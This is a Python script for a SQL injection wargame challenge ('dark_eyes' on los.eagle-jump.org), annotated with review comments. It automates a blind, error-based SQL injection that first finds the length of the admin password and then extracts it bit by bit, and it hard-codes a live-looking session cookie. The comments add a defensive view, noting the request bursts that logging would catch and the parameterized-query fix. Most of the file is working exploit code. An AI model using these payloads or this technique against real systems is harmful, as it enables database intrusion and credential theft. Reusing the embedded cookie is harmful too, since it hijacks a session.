import urllib2

def request(data):
    """Send one probe to the challenge page and report whether the marker appeared.

    ``data`` is URL-quoted and appended as the ``pw`` query parameter.
    Returns True when the response body contains the text "addslashes",
    False otherwise.
    """
    # NOTE(review): what the marker means on the server is not visible here.
    # Presumably the page only renders its usual content when the query runs
    # without a database error - confirm against the challenge source.
    target = (
        "https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw="
        + urllib2.quote(data)
    )

    # NOTE(review): a session cookie is hard-coded below and published with
    # the script. Anyone reading it can replay the session until it expires;
    # treat the value as compromised and load it from the environment or a
    # local config file instead of committing it.
    headers = (
        ('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
        ('Cookie', '__cfduid=dc3f1581bf2ce11c70afbb877548363c31517875851; PHPSESSID=lua2edl01o0446vgm61mr0dar6'),
    )

    probe = urllib2.Request(target)
    for header_name, header_value in headers:
        probe.add_header(header_name, header_value)

    # NOTE(review): urlopen is called without a timeout, so a stalled
    # connection blocks the whole run.
    body = urllib2.urlopen(probe).read()
    return "addslashes" in str(body)

# Driver for a wargame exercise: recover the 'admin' row's pw value one bit
# per request, using request() as a true/false oracle.
#
# Defender's view: every answer costs one HTTP request, so a run produces up
# to 100 requests for the length plus 8 per character, all near-identical
# and aimed at the same parameter. That burst is what request logging and
# rate limiting would surface. Presumably the endpoint concatenates pw into
# its SQL; a parameterized query removes the oracle altogether - confirm
# against the challenge source.
length = 0
admin_pw = ""

# Phase 1: try candidate lengths 0..99 and keep the first one the oracle accepts.
# NOTE(review): if no candidate is accepted, length stays 0 and the script
# goes on to print an empty password without reporting the failure.
for candidate in range(0, 100):
    payload = (
        "' or 1=1 and id='admin' and 1=(select "
        + str(candidate)
        + " in (length(pw),(select 1 union select 2)))#"
    )
    if not request(payload):
        continue
    length = candidate
    break

print("[*]Admin Password Length = " + str(length))

# Phase 2: for each character position, read its 8-bit binary form bit by bit.
# The payload pads bin(ord(...)) to 8 digits, so this assumes every character
# code fits in one byte.
for position in range(1, length + 1):
    bits = []
    for bit_index in range(1, 9):
        payload = (
            "' or id='admin' and 1=(select 1 in (substring(lpad(bin(ord(substring(pw,"
            + str(position)
            + ",1))),8,0),"
            + str(bit_index)
            + ",1),(select 1 union select 2)))#"
        )
        bits.append("1" if request(payload) else "0")
    admin_pw += chr(int("".join(bits), 2))
    # Progress line: shows the prefix recovered so far.
    print("[-]Admin Password = " + admin_pw)

print("[*]Admin Password = " + admin_pw)





















